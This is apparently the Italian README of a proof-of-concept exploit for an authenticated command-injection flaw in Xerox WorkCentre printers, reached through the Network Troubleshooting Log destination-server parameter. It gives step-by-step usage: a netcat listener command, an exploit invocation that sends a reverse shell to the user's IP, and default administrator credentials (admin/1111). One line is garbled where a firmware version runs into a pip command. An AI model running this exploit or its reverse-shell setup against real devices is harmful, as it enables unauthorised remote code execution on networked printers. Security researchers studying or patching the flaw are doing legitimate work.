
Vulnerabilità di esecuzione di codice in remoto che richiede autenticazione nelle stampanti Xerox WorkCentre tramite la funzionalità Network Troubleshooting Log.
Vulnerabilità di esecuzione di codice remoto autenticata nelle stampanti Xerox WorkCentre tramite la funzionalità Network Troubleshooting Log.
La funzionalità Network Troubleshooting Log (/properties/security/network_troubleshooting_log.php) non sanifica il parametro del server di destinazione (security.nwtroubleshoot.destination.server), consentendo a un amministratore autenticato di iniettare comandi OS arbitrari. Quando viene avviata la cattura del log di rete, il payload iniettato viene eseguito come comando shell, con conseguente esecuzione di codice remoto.
073.110.019.14200)pip install -r requirements.txt
Avvia un listener sulla tua macchina:
nc -lvnp 8443
Esegui l'exploit:
python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443
| Argomento | Richiesto | Predefinito | Descrizione |
|---|---|---|---|
--target | Sì | URL del target (es., https://192.0.2.1) | |
--lhost | Sì | Indirizzo IP del listener | |
--lport | No | 8443 | Porta del listener |
--user | No | admin | Nome utente amministratore |
--password | No | 1111 | Password amministratore |
--proxy | No | URL del proxy (es., http://127.0.0.1:8080) |
Questo strumento è fornito esclusivamente per test di sicurezza autorizzati e scopi educativi. L'accesso non autorizzato a sistemi informatici è illegale.